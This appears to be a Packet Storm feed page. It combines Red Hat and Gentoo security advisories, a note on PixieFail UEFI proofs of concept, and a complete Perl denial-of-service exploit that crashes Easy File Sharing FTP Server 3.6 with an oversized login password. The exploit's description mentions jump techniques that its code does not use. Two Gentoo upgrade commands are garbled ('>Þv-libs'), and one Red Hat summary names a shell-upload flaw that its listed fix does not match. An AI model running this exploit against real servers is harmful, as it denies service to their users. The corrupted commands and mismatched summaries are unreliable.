Red Hat Security Advisory 2024-0191-03 - An update for openstack-tripleo-common is now available for Red Hat OpenStack Platform 17.1. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0191.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat OpenStack Platform 17.1 (openstack-tripleo-common) security updateAdvisory ID:        RHSA-2024:0191-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0191Issue date:         2024-01-16Revision:           03CVE Names:          CVE-2022-38060====================================================================Summary: An update for openstack-tripleo-common is now available for Red HatOpenStack Platform 17.1 (Wallaby).Red Hat Product Security has rated this update as having a security impactof Moderate. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE link(s) in the References section.Description:This update affects a Python library for code used by TripleO projects.Security Fix(es):* sudo privilege escalation vulnerability (CVE-2022-38060)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-38060References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2124758

Red Hat Security Advisory 2024-0191-03

Red Hat Security Advisory 2024-0190-03 - An update for GitPython is now available for Red Hat OpenStack Platform 17.1. Issues addressed include a local file inclusion vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0190.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat OpenStack Platform 17.1 (GitPython) security updateAdvisory ID:        RHSA-2024:0190-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0190Issue date:         2024-01-16Revision:           03CVE Names:          CVE-2023-41040====================================================================Summary: An update for GitPython is now available for Red Hat OpenStack Platform17.1 (Wallaby).Red Hat Product Security has rated this update as having a security impactof Moderate. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.Description:GitPython is a python library used to interact with Git repositories.Security Fix(es):* Blind local file inclusion (CVE-2023-41040)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-41040References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2247040

Red Hat Security Advisory 2024-0190-03

Red Hat Security Advisory 2024-0189-03 - An update for python-werkzeug is now available for Red Hat OpenStack Platform 17.1. Issues addressed include denial of service and remote shell upload vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0189.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat OpenStack Platform 17.1 (python-werkzeug) security updateAdvisory ID:        RHSA-2024:0189-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0189Issue date:         2024-01-16Revision:           03CVE Names:          CVE-2023-46136====================================================================Summary: An update for python-werkzeug is now available for Red Hat OpenStackPlatform 17.1 (Wallaby).Red Hat Product Security has rated this update as having a security impactof Moderate. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.Description:Werkzeug is a WSGI utility module. It includes a debugger, request and response objects, HTTP utilities to handle entity tags, cache control headers, HTTP dates, cookie handling, file uploads, a URL routing system and a numerous community contributed add-on modules. Werkzeug is unicode aware and does not enforce a specific template engine, database adapter or a specific way of handling requests. It is useful for end user applications, such as blogs, wikis, and bulletin boards, that need to  operate in a wide variety of server environments.Security Fix(es):* high resource consumption leading to denial of service (CVE-2023-46136)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-46136References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2246310

Red Hat Security Advisory 2024-0189-03

Red Hat Security Advisory 2024-0188-03 - An update for python-eventlet is now available for Red Hat OpenStack Platform 17.1.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0188.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat OpenStack Platform 17.1 (python-eventlet) security updateAdvisory ID:        RHSA-2024:0188-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0188Issue date:         2024-01-16Revision:           03CVE Names:          CVE-2023-5625====================================================================Summary: An update for python-eventlet is now available for Red Hat OpenStackPlatform 17.1 (Wallaby).Red Hat Product Security has rated this update as having a security impactof Moderate. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.Description:Eventlet is a networking library written in Python. It achieves highscalability by using non-blocking io while at the same time retaining highprogrammer usability by using coroutines to make the non-blocking iooperations appear blocking at the source codelevel.Security Fix(es):* patch regression for CVE-2021-21419 in some Red Hat builds(CVE-2023-5625)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5625References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2244717

Red Hat Security Advisory 2024-0188-03

Red Hat Security Advisory 2024-0187-03 - An update for python-urllib3 is now available for Red Hat OpenStack Platform 17.1.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0187.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat OpenStack Platform 17.1 (python-urllib3) security updateAdvisory ID:        RHSA-2024:0187-03Product:            Red Hat OpenStack PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0187Issue date:         2024-01-16Revision:           03CVE Names:          CVE-2023-43804====================================================================Summary: An update for python-urllib3 is now available for Red Hat OpenStack Platform 17.1 (Wallaby).Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python HTTP module with connection pooling and file POST abilities.Security Fix(es):* Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-43804References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2242493

Red Hat Security Advisory 2024-0187-03

Easy File Sharing FTP version 3.6 remote denial of service exploit.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: Easy File Sharing FTP Server 3.6 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 17 january 2024  
# Vendor Homepage:  N/A  
# Download to demo:   
# Notification vendor: No reported  
# Tested Version: Easy File Sharing FTP Server 3.6  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=U2svu2FiIVc

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server does not correctly handle the amount of data or bytes of the password entered by the user.  
#When authenticating to the FTP server with a long password or a password with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x2c";  
    $payload .= "A"x2000;  
    $payload .= "\x41"x610;

    my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";

    $ftp->login("anonymous",$payload) or die "[+] Possibly exploited!";              

    $ftp->quit;

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#         Easy File Sharing FTP Server 3.6 - Denied of Service       #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com               #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Easy File Sharing FTP 3.6 Denial Of Service

This archive contains proof of concepts to trigger the 7 vulnerabilities in Tianocore's EDK II open source implementation of the UEFI specification. Issues include an integer underflow, buffer overflows, infinite loops, and an out of bounds read.

PixieFail Proof Of Concepts

Gentoo Linux Security Advisory 202401-24 - Multiple denial of service vulnerabilities have been discovered in Nettle. Versions greater than or equal to 3.9.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-24  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Nettle: Denial of Service  
     Date: January 16, 2024  
     Bugs: #806839, #907673  
       ID: 202401-24

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple denial of service vulnerabilities have been discovered in  
Nettle.

Background  
=========  
Nettle is a cryptographic library that is designed to fit easily in  
almost any context: In cryptographic toolkits for object-oriented  
languages, such as C++, Python, or Pike, in applications like lsh or  
GnuPG, or even in kernel space.

Affected packages  
================  
Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
dev-libs/nettle  < 3.9.1       >= 3.9.1

Description  
==========  
Multiple vulnerabilities have been discovered in Nettle. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
A flaw was found in the way nettle's RSA decryption functions handled  
specially crafted ciphertext. An attacker could use this flaw to provide  
a manipulated ciphertext leading to application crash and denial of  
service.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Nettle users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-libs/nettle-3.9.1"

References  
=========  
[ 1 ] CVE-2021-3580  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3580  
[ 2 ] CVE-2023-36660  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36660

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-24

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-24

Gentoo Linux Security Advisory 202401-23 - A buffer overread vulnerability has been found in libuv. Versions greater than or equal to 1.41.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-23  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: libuv: Buffer Overread  
     Date: January 16, 2024  
     Bugs: #800986  
       ID: 202401-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A buffer overread vulnerability has been found in libuv.

Background  
=========  
libuv is a multi-platform support library with a focus on asynchronous  
I/O.

Affected packages  
================  
Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
dev-libs/libuv  < 1.41.1      >= 1.41.1

Description  
==========  
libuv fails to ensure that a pointer lies within the bounds of a defined  
buffer in the uv__idna_toascii() function before reading and  
manipulating the memory at that address.

Impact  
=====  
The overread can result in information disclosure or application crash.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All libuv users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-libs/libuv-1.41.1"

References  
=========  
[ 1 ] CVE-2021-22918  
      https://nvd.nist.gov/vuln/detail/CVE-2021-22918

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-23

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-23

Gentoo Linux Security Advisory 202401-22 - Multiple vulnerabilities have been discovered in libspf2, the worst of which can lead to remote code execution. Versions greater than or equal to 1.2.11 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-22  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: libspf2: Multiple vulnerabilities  
     Date: January 15, 2024  
     Bugs: #807739  
       ID: 202401-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in libspf2, the worst of  
which can lead to remote code execution.

Background  
=========  
libspf2 is a library that implements the Sender Policy Framework,  
allowing mail transfer agents to make sure that an email is authorized  
by the domain name that it is coming from.

Affected packages  
================  
Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
mail-filter/libspf2  < 1.2.11      >= 1.2.11

Description  
==========  
Multiple vulnerabilities have been discovered in libspf2. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Various buffer overflows have been identified that can lead to denial of  
service and possibly arbitrary code execution.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All libspf2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-filter/libspf2-1.2.11"

References  
=========  
[ 1 ] CVE-2021-20314  
      https://nvd.nist.gov/vuln/detail/CVE-2021-20314  
[ 2 ] CVE-2021-33912  
      https://nvd.nist.gov/vuln/detail/CVE-2021-33912  
[ 3 ] CVE-2021-33913  
      https://nvd.nist.gov/vuln/detail/CVE-2021-33913

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-22

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Source

Packet Storm